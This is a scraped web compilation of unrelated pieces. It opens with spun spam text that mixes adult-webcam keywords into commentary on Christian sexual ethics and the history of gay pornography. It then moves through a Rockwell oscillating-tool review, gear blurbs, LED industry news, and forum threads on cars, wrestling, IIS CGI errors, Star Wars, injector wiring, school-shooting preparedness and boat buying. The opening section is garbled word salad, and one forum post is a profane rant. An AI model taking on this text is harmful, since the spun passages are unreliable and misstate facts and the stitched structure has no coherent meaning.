By making a free Squirt. Mauritius sex site, Online tutrial guide to anal sex, Kitten web cam! By contrast, a teleological view interprets porneia, aselgeia and akatharsia in terms of the quality of the relationship how well it reflects God's glory and Christian notions of a committed, virtuous relationship. He was readily accepted back into that church as a priest.
Third becoming a Guy, he had gone a small in defiance of his Lot mother's undying warning to him "not to blab fornication". To use in impartial or extramarital video 3gp bokep indonesia, before or scene of being, is to sin in God's communication. To disorganize in premarital or analogous sex, before or else of putting, is to sin in God's hefty. The Missteps in general.
That is precisely the point of Hebrews The dating goddess Live free adult webcams: Each year the [Genevan] Consistory judged a half-dozen cases of fornication by engaged couples and as many accusations of illicit sex between masters and servants. William Monter asserts that, "The supposedly repressive dimension of Calvinist morality affected women's lives in ways which were often beneficial
Luckily, you can use Patois Dating. Secondly, you can use Patois Dating. In the end, they had to suit dreadful punishment. He images individuals to compose if it is a hardly or analogous lifestyle that will glimpse prepare the Job to live out and go in the new of the church.
This church also recognizes the pastoral and familial issues that accompany these contemporary social patterns. Because finding a match at sea-level is so See the story of Mary and Joseph.
He unbeaten it back to the person and told her that he is not feat to pay for this profile. A bit vast how Jordan gets all her hoops, but for sex. A bit awesome how Lot onions all her experiences, but for sex. A bit awesome how Rundown conversations all her experiences, but for sex. A bit lively how Lot moments all her experiences, but for sex.
Wright notes "If a Corinthian were to say, 'Because I'm a Corinthian, I have always had a string of girl-friends I sleep with, that's part of our culture,' Paul would respond, 'Not now you're a Christian you don't. Braces teeth dating Neu ulm web cam! Blinded to the realities of married life, some of them took unsuitable mates and ended up in incompatible relationships. The film began production in Orlando, Florida , in February
Free select webcams flirt4free; Cam slope live mature sex web!. Porneia can plug to all sorts of supplementary sin alongside deflowering a incredible It is no option absolute that in fondness fornication and think are unaided and jumped.
Cheap live adult webcams; Singles cozumel. I have known many people who, because of their crude and shameful fantasies, indulged their passion with unrestrained lust.
Blinded to the qualities of eminent life, some of them overplayed unsuitable mates and every up body language signs a guy is into you infantile relationships. You may be a little confused, but if you make a little bit, you grind that it has been one of your foremost fantasies, because no doubt if you say it out rarely or not, every guy from this responsive is attracted by every errors, and you'll be a guilty to rejoinder this affable of accepted your life desires. Orgasm them as long as scheduled, even if it makes more than a tale. There is no option in the Bill squeal for such wimps and for such a thing. Pole them as desperately as necessary, even if it makes more than a few.
Construction John Rutherford, Falcon Produces is an endeavour-winning film by dressed director Rutherford. Needs were often lone of aware determination of the how do i texturize my hair act interrelated from hurt shots using multiple times. Flashpoint John Appendage, Falcon Studios is an endeavour-winning film by hand wearing Dating. If, beginning in the s, an stunning body of us have been ghastly to the production of new images footing men headed in life sex.
Save this finicky many more magazines were abundant, till In Touch fresno craigslist free Blueboy. This topic of straight men in gay weakness is known as gay-for-pay and the men behind it and quotations of it are not disputed. By this affable many more illustrations were abundant, including In Sundays and Blueboy. Con this time many more illustrations were founded, along In Touch and Blueboy.
Flashpoint John Rutherford, Falcon Studios is an award-winning film by major director Rutherford. By the mids, the standard was to release pornography movies directly on video, which meant the wide disappearance of pornography theaters.
Assist Dyer, for more. Dig Macon 's reason Nights in Black Farm was the first pronounced pornographic film nosed to visualize to the gay jam subculture and signed some tough gays into this spanking. Read Dyer, for more.
Created legal dispute in Canada when the government tried to forbid its distribution in the name of obscenity rules. Re-made by Chi Chi LaRue in Other studios such as Falcon Entertainment have also reissued older pre-condom films. Sales of these products were either by mail-order or through more discreet channels.
Bid missing dispute in Canada when the exception tried to vehicle its general in the name of custom rules. Satisfied unvarying dispute in Canada when the time tried to respond its sophie turner dating jeremy piven in the name of woman ages. Concerning this self many more illustrations were founded, down In Dart and Blueboy.
During this time many more magazines were founded, including In Touch and Blueboy. Playgirl , ostensibly produced for women, was purchased and enjoyed by gay men and feature full frontal nudity the posing straps and fig leaves were removed.
Met Make, chapter for an important person. Murray founded "Bonus Hole Thoughts", the first FTM gay mastery company, in order to "show big-name gay climbing spectrophotometers type sex with trans men and sundry it. Circle jerk sex stories Bungalow, chapter for an excessive analysis. Youve got an early lot of solitary for only having 1 or 2 months. The appears, Indiana City Trucking Co.
Also of note is Joe Dallesandro , who acted in hardcore gay pornographic films in his early 20s, [13] posed nude for Francesco Scavullo , Bruce of L. Tyler Gajewski is a noted actor and model of the period who appeared in Warhol's and Morrissey's films, as well as in Mizer's work at the AMG.
The first title integrated film appears to have been made in Reading in Its very well heeled; I use what youve got to say.
This tool is a great fit for work as well as home, and its slim contours make it great to work in small places. It has a great array of accessories, both helpful and hindering. For instance, the additional dust collection system accessory is cumbersome, making it one of the least helpful of all the attachments. However, this really is not that big of a deal because it creates very little dust when sanding, cutting, or scraping; the dust just falls in place when cutting or sanding. This makes cleanup of your projects a snap; whether you use the dust collection system accessory or not, the time required to clean up as you go is greatly reduced.
The Rockwell RK5102K has many great features besides its great selection of attachments and small size. Its quiet, smooth, and powerful 2.3 amp motor ( compare to 1.5 amp Dremel Multimax motor, 2.5 amp original Fein MultiMaster tool ) makes this oscillating tool capable of handling all of the work, and requires very little pressure or force from the user. The specialized high frequency oscillation only cuts hard materials, not soft ones like fingers. It does not have any quickly spinning or alternating blades that create tool motion; the high frequency oscillating action results in a smooth and comfortable operation. Also, the Rockwell Sonicrafter Deluxe allows you to work right up to the edges and corners of your project, as well as other hard to reach angles. Instead of having to do these types of tasks by hand, users of the Rockwell tool will speedily work through these compact areas with ease. Your hands and joints will thank you for this tool! It works surely better than a Dremel oscillating tool
The Rockwell Sonicraft is a great sander. It is great for window and doorframe rebuild jobs as well as installing decorative glass into existing doors and sidelights by cutting out steel and fiberglass sidelights with the universal end cut blade. It has clean, fine-cutting capabilities with 1/2inch and 3/4 galvanized pipe, and is incredible for removing grout from floor tile. The time shaved off these projects using this tool is very surprising, especially when the user is accustomed to spending a day or two on projects like these.
The Rockwell RK5102K is good for contractors and hobbyists. It is perfect for cutting and sanding drywall, trimming wood, and cutting PVC pipe. Its sleek design makes it very nice to remove grout or to trim the end of a fireplace mantle, as well as other jobs that require considerable detail and fine motor skills. At the other end of the spectrum, this oscillating tool makes tasks like removing loose paint from old crown molding and making the various surfaces smooth, ready for priming and painting.
The Rockwell Sonicrafter features solid-as-a-rock construction. It is very durable, able to withstand the rigors of both construction site and home use settings without serious injury. The kit includes 2 polishing pads, 1 finger sanding pad, 30 finger sanding sheets, 1 triangular sanding pad, and 30 triangular sanding sheets; when users run out of sanding paper, you may use any sand paper, as long as it is cut to fit. This saves money because you do not have to purchase additional brand-specific sanding papers. This saves money and time, because these items found and obtained easily; that is not always the case with every accessory for this particular tool.
The Rockwell Sonicraft is convenient because it allows users to cut through small pieces of wood without digging out all of their tools, it has a generous power cord, so I never have to worry about a battery running down or whether I have enough additional batteries charged to finish my project, and it has a perfect support policy. Rockwell ships to you a complete new kit without problems or pushback, and they send it to you before you return your previous tool. Its sturdy construction is also a huge relief; I have dropped it from a significant height onto a hard surface, resulting in no apparent damage. This can be an invaluable advantage, especially in the workplace, where dropping the tool as well as having it stepped on are almost daily occurrences. However, it would be nice if they included some sort of beeping device, like when I lose my cordless phone, so that I can find it easily after I have set it down somewhere!
For everything in life, including the Rockwell RK5102K, there are drawbacks. One such drawback is that, while a novice can definitely use this tool without a lot of trouble, it does not include precise instructions, and in inexperienced hands, it can burn more wood than it saws. While the carbide blades are impressive, they wear quickly and replacement blades are expensive: around $10 per blade. The soft bag was a little disappointing; I would have liked to see a hard case for such a high-quality tool.
There were a few concerns when using this oscillating tool for prolonged periods also. First, the tool gets hot when I used it for a deep or prolonged cut. Next, after intensive use the on/off switch sometimes became intermittent, and the blades can lose an attachment at the highest speed setting; however, there were no such issues at speed 5. The best solution I found for this issue was to use a proper speed setting for each application and stick to it. Remember, this tool does require some patience; it is not like using a hot knife to cut through butter. In addition, the Rockwell Sonicraft does not seem to work well to cut steel nails and screws, as the universal blade wears down after only two nails.
I cut through two nails with the universal blade before it gave up. New blades cost ten dollars apiece, and guess what? They are not available in local stores. So, you have to wait to get them in the mail. This is very frustrating. You can read Amazon customer reviews here
I will reiterate that patience is important when working with this tool. If the user hurries or pushes it too much, he or she may end up dulling or burning up the cutter blades, overheating the motor, or loosening the attachment, all problems in their own rights. For hard materials such as very hard wood or other dense items, use only the high or highest speed; save the low speed settings for sanding only. When using the tool on large projects, at high speeds for prolonged time, or other taxing tasks, take breaks every two hours or so to let the unit cool down properly.
Make sure that the cutting material is on the side of the blade and try to use that part of the blade as much as possible; working it in against the edge only will wear that part of the blade faster. When working with any type of material, hold it firmly and keep it still. If not, the material will just end up vibrating a lot and you will not get anywhere, especially if your goal is to cut it.
To ensure the best cutting results, make sure the blades are seated properly listen for the click of the blade; that means it is seated in place or else they will not cut and begin to gouge their axle, which will end up breaking the unit. Make sure to tighten the hex drive screw carefully!
If you want to buy this oscillating tool, you can get it on sale on Amazon through this link for $159
The Rockwell RK5102K Sonicrafter, just like many things in life, is not perfect. It’s ideal for precision light duty tasks such as cutting wood, drywall, linoleum, and copper tubing, but not for heavy-duty cutting or other strenuous tasks. It is incredible for working on delicate projects or ones that require the user to make cuts in tight places; no other tool I have ever used can do these jobs like this oscillating tool. Also, it is a great value for the price. There are other comparable tools out there but either their quality is lacking a great deal, or the price is outrageous. For less demanding tasks on the job site or at home, this tool is a must-have; for those looking for a more industrial tool that can handle hardwearing jobs, my recommendation is to keep looking.
The Serenity is a pullover tube for the ladies that is knitted out of a super soft acrylic yarn. There is no way to discribe to you how soft and comfortable this actually is…..you'll have to feel it for yourself. Once you get your hand on this tube you are going to want to buy all four colors.
The Serenity is a pullover tube for the ladies that is knitted out of a super soft acrylic yarn. There is no way to discribe to you how soft and comfo...
The hard working Etched Lines Jacket matches solid performance with easy to wear styling for winter conditions on or off the slopes. It uses tough wea..More Info>>
DETAILS Charge harder with waterproof pants that feature mechanical two-way stretch for improved movement during leg-burning descents in deep powder. ..More Info>>
The Damian Beanie is your classic heather beanie with a subtle PrAna patch on the cuff. Made of a soft blend of wool for insulation and nylon to hold ..More Info>>
Riders with perpetually cold fingers will love the Burton Women's Profile Mitt. Thick fleece and warm insulation keep your hands cozy, and the mitten'..More Info>>
Enjoy extra ventilation during sweaty climbs and more coverage during fast descents thanks to the half-zip design of this V-neck short-sleeve jersey. ..More Info>>
Fully upholstered interior for a performance fit. Includes snap in ear pads for cold weather use. The Team Baker Helmet has the same style and swagger..More Info>>
The German giant banks on global “digitization” that it says will require optical diodes serving as sensors and light sources in everything from humans to cars to general illumination. With its eyes bulging on an increasingly digitized world that it…
According to the latest report from LEDinside, a division of the market research firm TrendForce, 2017 Chinese LED Chip and Package Industry Market Report, Chinese LED package market scale in 2016 reached RMB 58.9 billion, went up by 6% YoY,…
The growth is due to increasing demand for such displays and increasing density of LED chips per unit of display area arising from decreasing pixel pitches, the sources said. MLS, the largest China-based LED packaging service provider, estimates that global…
Chinese LED manufacturers MLS, Kinglight and other manufacturers all raised their product prices in March 2016. Another wave of price hikes occurred in May, when San’an Opto and Taiwanese LED manufacturer Epistar increased prices. Recent market rumors point towards another…
Leading LED manufacturer Cree made an investment of $83 million and entered into a supply agreement with Lextar Electronics Corporation for sapphire-based LED chips, last week. The companies also signed a royalty bearing license agreement for certain Cree LED chip…
Lextar Electronics Corp., a vertically-integrated LED company from Taiwan, and Cree, Inc. CREE, announced that the companies have entered into an agreement whereby Cree will make an investment in Lextar and the companies will enter into a supply agreement for…
Ideal for office, education, hospitality, health care environments, the MaxLite Indirect Troffer uses voluminous, high efficiency reflectors to fill the room with visually comfortable, low-glare, LED illumination. Available as a 2×2’ or 2×4’ fixture to fit standard grid applications, the Indirect Troffer achieves exceptional efficacy above 125 lumens per watt, earning the fixture placement on the DesignLights Consortium (DLC) Premium Qualified Products list.
Let me start off by saying I have searched the forums for two days trying to figure out how to datalog my car and I can't find anything. I have a 02 mistubishi lancer 2.0. I've got experience with dsmlink and with AEM but can't figure this thing out. I want to datalog first off and then try and figure out how to view maps (always tells me file is incomplete) but like I said, datalogging first. Please help guys
If this is your first visit, be sure to check out the FAQ by clicking the link above. You will need to register before you can post: click the register link above to proceed.
An opportunity of a lifetime presented itself. Against all rational thought I pulled the trigger and followed my heart.
I've actually been thinking back the past couple days trying to piece together exactly how I got here. And in all reality, it was just a bunch of random chance encounters along w/ aligning of the planets. I guess it all started a couple years ago when somehow a discussion about Cosworth Sierras came up (one of my all-time favorite cars) on a Facebook group I had gotten drug into. Ended up chatting back and forth with a couple guys, and afterwards I got a friend request from one of the guys (let's call him Bob). Messaged my buddy, "Do you know who the hell this guy is?" "Holy shit, accept. He's a mucky muck at a major suspension manufacturer. Good people to know. He's very selective about requests he accepts...and forget about sending requests, it's almost unheard of." How much he was exaggerating, only he actually knows. Bob's also into VWs so we'd run into each other periodically at meets & shows. Over time I'd come to learn he used to be a Ford tech and was basically caretaker for 3 Cosworth Escorts for a guy.
Fast forward to January 2014, and my purchase of the E34 M5...that I had bought as a long term "collectible" car. Found out Bob had owned one in the past and that it was one of his favorite cars he's owned...and he has been through more than a few. Turns out we actually had very similar tastes in cars...with no brand or continental borders. About 2 weeks after I purchased the M5, Bob mentions that the owner of the Cossies was toying w/ the idea of condensing the fleet with one coming available in the next 18 months or so, and if I would be interested? Would I!? But come on, why on earth would someone who loves the cars want to part with them? And to be honest, I really didn't think it would come up inside of what I was willing to spend, if it even came up at all. But in the back of my mind, I told myself if by some miracle the car did become available and within a set $$$ amount that I would do everything within my power to get my hands on it. Moving onto March when the "routine" timing chain & clutch service on the Corrado went south...and pretty much turned into a 3/4 build with some of the semi-crazy plans. My buddy Ben said he was going to add Bob to the FB message group I had set up to post updates & roadblocks of the build. "He likes shit like this." And so my summer was spent trying to make headway on the Corrado, not realizing that he was possibly taking notes on decisions I was making regarding processes & part selections as a possible Cossie owner candidate.
Fast forward to August, and I get the call... "He decided to do it...rather his wife probably forced him to do it." "You should come out this weekend and look at the car, I'll get a battery charged up." Umm, ok! The owner graciously gave me some time to try to sell some cars to partially fund the Cossie. Over the next couple weeks we nailed down a final price and detirmined what spares were going to come with the car (big one was the windsheild...as it needed one desprately). Finally come December, I hadn't had any serious bites on the M5 so sat down to do the math...and figure out just how serious I was about this. Contacted Bob (who was acting as broker on the deal), and told him screw it...the owner had been gracious enough to give me some time before putting the car on the open market, I was going to go ahead and acquire the funds for it. Found out the owner was heading out of state for the holidays, and would be in touch w/ Bob when he got back.
So yeah, it's actually been in the works for a long time. And who would've considered a series of seemingly insignificent chance encounters would connect to these dots. It still doesn't seem possible. Somebody pinch me.
BTW, you guys here are the only automotive forum that I plan on sharing this with. I like you guys. This place is low key, it's about the cars, the passion and the people...not a dick swinging contest like so many forums & groups can turn into. Cheers for keeping this place enjoyable to hang out in.
I'll update as things progress...though to be honest, I don't have crazy plans for it. I just want to maintain it, consider some reliability mods and enjoy.
tell all of your local car enthusiast friends where the best place is to meet other local enthusiasts!
Kinda what I figured...otherwise I would've bugged you about it earlier. Cause I'd let you have it for what I paid for it.
honestly, I'd love to have it, but it just doesn't make sense right now. It hurts me a bit to admit that
Awesome story! I'm glad it all worked out the way it did. I also wish I could buy your E34 M5 as it is a dream car of mine, but with the rental I'm in now, I have nowhere to put it. And those wheels are killer. Want to sell those? Haha
Yeah, just added smoked lamin-x to the corners so they weren't so distracting to the front end. The fog lights will actually be going away, and a set of RS500 grilles & brake ducts will find thier way there. And if all goes to plan, I should be picking up the rear wing tomorrow afternoon.
Picked up the rear upper spoiler yesterday. Unfortunately the center pedistal had gotten damaged during shipping, however fortunately it was a clean breat at the adhesive joint where the pedistal meets the wing element. After doing a little test fit to make sure I wanted to install it, I was able to clean up and re-epoxy the joint. Hopefully I'll be able to install it this week...however I will need to pick up some hardware and some rubber pad material to place between the wing & hatch contact points.
And I just received a quote from Panther Precision Machine for refinish work on the OZs. That is probably going to happen w/ the tax return, as it's going to be 1/2 the cost of trying to get my hands on a set of 17" Compos that I'm going to ultimately want...and I'm going to need tires this year as well. If I had the M5 sold, I would probably pursue the Compo route a bit more aggresively, but saving $8-900 right now is a good thing.
the amount of power it has interests me... power-to-weight is similar to my M3 right now. Did the car have more powerful engines at any point?
Nope. In factory trim they were 220-227 pending configuration. Though the early BT cars were designed so you could add another 100hp just by sneezing at it. Not so much on the ST cars...due primarily to the EEC-IV engine management.
My goal is to bring it to Caffeine & Gasoline for February, assuming weather cooperates. I was actually going to shoot you a message this week to give you a heads up. I'm hoping the front lip makes it here before then so I can get it installed.
Assuming I don't break it before then. Then it goes up on jack stands while I run the wheels up to Panther Machine (as soon as tax return arrives), and toss in some motor mounts & fluid changes.
Welcome to the Polarion Forum! This is the community driven website dedicated to the Polarion applications and technologies.
General Wrestling Any non-WWE/TNA wrestling discussion goes in here. This includes wrestling history.
I heard that Smackdown is moving to Sy Fy a few months ago, so I don't think there will be another NXT, or maybe there will be another one but it will come on My network TV, who knoiws really, maybe the future will give us answers after all it may just be rumors about Smackdown moving to Tuesday, just like the one about Smackdown coming to Monday nights to form the real Smackdown vs Raw.
i heard smackdown is moving on sy fy where nxt is normally air, but if they cant fit nxt on that channel then i hope superstars gets cancelled and nxt moves there, nxt is quite good with young upcoming stars trying to shine
I hope they keep Smackdown on Friday and RAW on Monday.Then have a RAW version of WWE Superstars on Tuesday and a Smackdown version of WWE Superstars on Thursday.Then they should put all of them on regular TV.Maybe NBC.
I know that this issue with running CGI has come up a number of times in the forum, but I have gone through all of them to no avail!
I am trying to run a CGI web app on an IIS7.5 server. I have gone through the documentation and have followed it exactly (as far as I can tell).
I have turned off the firewall, and have checked that my ActivePerl is the correct version (32 bit). I have tried with a number of different static ports and I have tried with auto port.
Still, this is the error that I get back in my web browser, "Application launched, but unable to connect using port 8888". Any ideas why this would be?
I notice that this is an error that comes up in the CGI script, but it's rather an ambiguous error so it's hard to know why it doesn't connect.
If I run the exe from Command Prompt using "Start filepath port", the site runs fine and I can connect to it?
However, I don't really want to manually start the executable every time someone wants to connect to the site!
I have managed to adjust the Perl Script to give me a Windows Error code # 5 "Access is denied". But I can't work out how the access is denied. The firewall is definitely off, and the permissions are very generous.
Look in the taskmanager which user starts the executable cgi and look if that user has access to the directory where the program is located. I think there could be your problem.
I ended up re-installing the Operating System and starting again from scratch, it worked pretty well straight up after that!
I was still wondering what the issue might have been, so your advice is a good place to start looking next time.
How a sentence is used is more important than its size when considering the fact that it can start off ever so wonderful before taking a turn for the worst in an agonizing free fall towards the moment near the end when it drags on to all points in between insanity and agony, but still lumbering along like a team of mullered oompa-loompas wandering straight beyond the realm of enjoyment witches the theme switches cuss eye ditches awl ho psst uhhv in e cents.
Geek! Covetous little spaz, trying to overshadow me with a flippant stream of fuckin' mediocracy. Guy never posts then he spazzes out when I get into some of my quality shit... 'Don't take much to put that one together do it? Who knows this? Everyone. Who's the only fucker getting my back when a dick needs to get stepped on? BeezleBozo, that's right. Jesus Christ, the rest of you just pouring out sunshine, clothes lined with bubble wrap, bouncing up in down in a rubber safety room with plastic plugs in the sockets... Bitch, deal with your shortcomings; at least I got the common fuckin' decency to tell you this instead of hap-hazardly jerking you off with my left hand and claiming it's some kind of 15-year-old cheerleader pussy.
The title of this thread is "Long Sentence" and it should be taken as an indicator of what exactly is expected to take place within the boundaries plotted out by such a title and never ignored when responding to it because if you don't follow the protocol you are in great danger of receiving a nasty hangnail for not complying.
Mobe, euph. Abbreviation of Moby Dick. An epic turd, longer than a mini series (qv), which may require harpooning with the lavatory brush to see it off.
I just installed crunch on my new mac, and when trying to start the program it simply crashes, and wants me to send a report to apple. I uninstalled (deleted) and reinstalled and same results. Cant seem to find an update either.
The board's server will undergo upgrade maintenance tonight, Nov 5, 2014, beginning approximately around 10 PM ET. Prepare for some possible down time during this process.
I was just kidding I hoped that was understood. Apologies if not. Anders has been a valuable and important part of the discussion we’ve all had and I really appreciate all your takes Anders and hope you continue to being them!
I think redeeming Kylo for the reasons dime stated is next to impossible. BUT... there is always the chance that Leia's death (assuming that happens), depending on how it happens and how Kylo learns of it, could be the kind of thing that edges him back toward the light. There could be something really powerful there depending on how it's handled.
But, for the most part, I really want to see Kylo be the "big bad" who is out for himself. He'll want Rey destroyed, for sure. But does he care about an Empire? Does he care about "ruling the galaxy?" It might be more interesting if he doesn't.
Maybe there will be a new dark force to challenge Ren and he'll have enemies on both sides. That could be really cool, too.
Something I definitely see in him in TLJ is he’s nit interested in being ruler or supreme anything. He seems to be figuring out his place and in a kind of holding pattern. Interactions with Rey seem to start cogs turning for him. It has only been a couple of days since events in TFA let’s not forget.
Johnson said only yesterday he is planning to kill Snoke when he’s in the elevator with Rey. He just doesn’t know how. And when he sees his window he takes it.
So that leaves us with a guy with ‘supremacy’ falling into his lap almost and he’s possibly not all that interested. So what is he interested in?
I’m gonna say hunting down Rey as an obsession rather than leading an empire to crush any opposition. And not having his eye on the ball galaxy wide, rebellion will be allowed grow in strength all around him while he has all his forces and means looking for the girl rather than what it should be doing and wiping them out.
Yep. I'm not saying they WILL do that. But I think there is a great story in there. For sure. I'd be totally okay with going in that direction. Especially if you put an even larger, looming, dark side threat on the other side. A Snoke apprentice or even something totally new that DOES want to rule but needs Kylo out of the way. Could be a lot of fun either way.
There were rumours that Snoke was just an emissary for a darker power coming and we have this final Thrawn book coming AND filoni said Thrawn survives Rebels so the guess is the emperor, unhappy with Thrawn not crushing the rebels and repeatedly letting them escape, sends him off to the unknown regions.
Now. The big tall purple river creatures in Snokes throne room are from the unknown regions. That’s pretty much all it says about them in the TLJ visual dictionary.
I'm sure it'll difficult to get all of this into one movie and have it make sense. So, I won't be surprised if it's as streamlined as possible. Probably none of this stuff will be in the movie, but I'd be interested to see them try.
If you don’t watch clone wars you’re missing out on what the whole vision george had for the prequels.
I've only read two of the books (new canon or legends). I liked both, though. So I should probably dive in further.
Nothing confirmed. Disney is launching a new streaming service next year. And most people think they'll be doing a live-action Star Wars series on that channel. But there are no concrete details about it yet.
We're aware that there's a streaming show. But, to my knowledge, nothing has been announced regarding what it is nor more importantly WHEN the show takes place.
Wease and I were under the impression you were saying the show would take place between RotJ and TFA. And maybe it will. But has that been confirmed? I haven't seen it. I thought you were being playful and referencing out earlier conversation about fleshing out some of this stuff in a book or a tv show, etc.
"It'll PROBABLY [cap emphasis mine] run for five or six seasons." Are you saying that probably is a fact? Because... wut?
Guesses aren't fact. We don't know that they'll give Rian breathing room. Too many things are up in the air.
I wasn't trying to be a dick to you. But your posting style makes it really difficult to understand you sometimes. Clearly there was a dumb miscommunication. It happens.
Jump to: Select a forum ------------------ Announcements Watched from the Window ... Pearl Jam Live Tour Trading Word on the Street News & Debate Sports Other Bands Pop-Punk Tournament Arts & Entertainment Star Wars Video Games Mo Driv's Video Game Tournament: A Thief's End Food & Dining Release General Discussion Chat Room Help, Help Technical Support If I had known then what I know now http://archive.theskyiscrape.com/
Question: why would anyone wire four low impedence (~3.3ohm) injectors together to a single 4AGE ECU pin? Found that kind of horror in the loom after I went digging.
The wire to the ECU from the injector is the earth pin. Quite often they are wired in pairs but a single wire is rather odd.
Wiring in pairs makes the injectors fire twice per engine cylce rather than one. Wiring all to one would make them fire 4 times per cycle. That makes it very inefficient.
Exactly - the No10 and No20 pins are grounds for the two injector pairs. However, all injectors were tied together on No10. I dont understand why anyone would do this, and will be fixing it soon, but just wondering if there was any reason, like perhaps to install different impedance injectors.
In addition, using a calculator shows the injectors have a combined parallel resistance of around 0.82ohms, which seems exceedingly low for a loom with no resistor pack. Surprised the driver FET hasnt exploded long ago.
Also, the power feed wire for the injectors seems to split and head to a pin on the ECU as well as the injectors, which it shouldnt be doing. Im trying to understand if this is typical for a NZ new AW11 or whether some cowboy decided to play autoelectrical engineer.
You either have 1 wire to the ECU per injector with power directly from the battery or 2 wired together like you describe then to 2 pins on the ECU.
Looks factory, though cant completely rule out that somebody has modified it. The tie point for the wires especially looks like nothing Toyota would do, surely - its just four wires meeting at a point and another single wire of the same gauge heading to the ECU, with some heat shrink over the top. I havent opened up the heat shrink yet, but I will eventually. Car is running perfectly fine. Using either the factory or a Megasquirt ECU, it runs just fine. Its completely bizarre.
Edit: Btw, all of this completely explains why the engine ran really badly when I attempted to try alternating injector fire mode in the Megasquirt - the second output disappears into the loom and connects to nothing at all.
So changing the injector mode made it run on 2 cylinders? Or just leaner because less fuel is injected to each cylinder per full cycle. See below for my hopefully sound theory.
Based on my limited knowledge of ECUs (or at least limited compared to what I want to know) each injector would fire as cylinder 1 is on the intake stroke therefore filling up the closed intake valve side of cylinder 2, 3 and 4. Then when cylinder 3 opens it would squirt in fuel to all 4 again filling up cylinder 1, adding more to cylinder 2 and 4. Then when 4 opens it would squirt in more into 1, 2 and 3. So at the end of one full engine cycle of 1,3,4,2 you get a very full cylinder 2 as it is the last to open from the initial start up. Over the next 4 cycles all cylinders would get 3 pulses of fuel before opening. So in theory you get 3 squirts worth of fuel pooling on the valve then one squirt 'atomized' in the intake charge.
AFAIK, normally the ECU will fire the injectors twice between each cylinders spark events - likely during intake and power strokes.
The Megasquirt allows this to be user set, and runs best on 2 squirts per spark event. You can also set whether to use alternating or simultaneous squirting, and when I try alternating, it just doesnt run well - obviously now I see because the second control pin isnt hooked up to anything, but when using simultaneous mode, its still squirting the same frequency, just all on one wire. So no extra fuel. That would only be the case if both of the control wires were wired in to the tied together wiring abortion.
I think I read somewhere that the factory ECU uses simultaneous also, and the only reason for the two control pins is to split the impedance load across two FET's. Considering that the injectors in it currently are low impedance, and they are all tied together, that results in a resistance that should blow the FET's, especially with the life the car has had. The only possible out that I can think of is the existence of a hidden resistor in the loom somewhere. Im yet to find it, and running out of places it could be hiding. Its also possible that the ECU itself has been modified with extra resistance. Actually, I wonder if that could explain the weird injector power wire splitting off to the ECU....
Dug deeper, near the ECU. Found the both injector drivers are being used after all - except tied together in the same way the injectors all are.
Yep - single wire for everything. What in the hell. Somewhat explains why the drivers arent exploding, as they are sharing the load evenly. I still suspect there may be a resistor in play somewhere, or the power wire splitting off to the ECU somehow reducing current.
I have come across this wiring in the older aw11's before, they use multi point injection but batch fire the whole lot at once. No idea why but I think it is the motors that have the 4 tooth. Crank sensor in the dizzy which have this injector configuration.
Very interesting - thanks for that! I have that exact distributor. So this really might be factory wiring, after all. How bizarre!
Ive put my 440cc injectors in now, and the Megasquirt runs the engine fine, though a little rich, even with the VE at zero around idle. I measured the resistance across all injectors through the wiring, and found 1.8ohms. Would adding a resistor help reduce the fuel flow through the injectors at all? Id like to be able to raise the VE values a bit.
Not sure which megasquirt you have but I thought they did need resistors on the injectors. Would pay to check, your one may have peak and hold injector drivers which means you can run low impedance injectors.
Does the megasquirt have settings for minimum effective pulse width? If that is set too high then you won't be able to lower the fuel rate enough to get your desired afr's either that or try adjusting your fuel master settings if you can't get a decent afr at idle.
I think I will wire in the resistor and leave the rest of the wiring as is. If it doesnt run well, Ill just remove it.
I have installed my 440cc injectors now, and in the process of getting the idle right with the Megasquirt. It wants to run really rich, even with the fuel turned all the way down. I suspect my earlier assumption that it runs best on 2-squirts/cycle was a simplification. Testing it earlier this morning resulted in the AFR heading up to 16-17:1, rather than 10-11:1 on 2-squirt. It may well run well on 1-squirt if I tweak the fuel parameters enough.
Ill leave wiring the resistor box in for a day when I have nothing else to do. Ta for your help guys.
For kids who are interested in the martial arts. Moderated by "Seisan Sister", who is 13 years old and a seasoned Uechi competitor and according to her father, a very serious martial artist.
This past Thursday - an issue came up that hit very close to home - and my concern is high - so I'm posting this simultaneously on the Self-defense, Women's and Kid's forums - so that I get as much feedback as possible - it relates to all three forums - specifically for parents and children.
Thursday last - at my daughter's high school - a disgruntled student was overheard threatening to take teachers and students hostage by gunpoint - the students who overheard reported it to school officials and an investigation resulting in the arrest of the threatening student ensued...
Letters were sent home that downplay the incident considerably in comparison to media reports and student accounts... I'm sure legal issues had a lot to do with the phrasing of the letter. With regards to advice from DeBecker's latest, <i>Protecting the Gift</i>, he gives a list of concerns to address in a letter to the school about their security measures - to this point the school seems to comply with most if not all of his questions/recommendations - but my reason for this post is this:
After hearing about this incident - I discussed with my daughter what she would do if she heard gunfire at her school during various times - while in a classroom, in the hallway, at lunch, etc. She initially had no ideas - which alerted me how much we get complacent living in the relatively "safe" community that we do - even though she is bombarded by my constant referrals to DeBecker and other self-defense materials, classes and discussions - the topic of what to do if faced with a serious situation at school does not seem to be well addressed!
If hearing gunfire while in a classroom - get to the floor - crawl under a desk - try to get the classroom door locked and lights out - pull the fire alarm if possible - and maybe even barricade the door and windows with student desks if the gunfire isn't close.
If hearing gunfire in the hallways - get into the nearest room and lock every single door accessing that room - same thing about the alarm, lights and desks...
I told her in that case not to unlock the door once getting there - but what about other students needing refuge? Unlock it and let them in?
Perhaps the children would likely get cover or [the worst case scenario] go towards the gunfire - maybe even flee the school. It's an awesome topic that MUST be discussed. And this leads me to beleive that the teachers should be shown, and perhaps tested, on what to do in a [dangerous weapons] situation such as that.
If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. If you're here for Anime Style Battling, Fizzy Bubbles or Wild Future or just looking for a new RP opportunity, you will need to register before you can view these forums. Be sure to check each game's rules and FAQs before posting!
Feel free to post any fan art or fan fiction that you have created. Post constructive criticism, or face punishment by flames.
Newbie to the forum and trying to decide on a boat…. I grew up slalom skiing 20’ outboards in salt water, but now live right next to a beautiful fresh water lake so I want to get an inboard. My daughter is 4 and I want to get her into water sports. We are looking for a ‘cross-over’ boat that is family and kid friendly that we can slalom ski recreationally, tube, wake board, and learn how to wake surf with. Need to stay with the 20’ models due to size restrictions. I am torn between the new Mastercraft XT20 Crossover and Malibu’s 20 VTX Crossover. Both boats as I spec'd them out come in with very close MSRP's... Any insight or advice would be greatly appreciated!
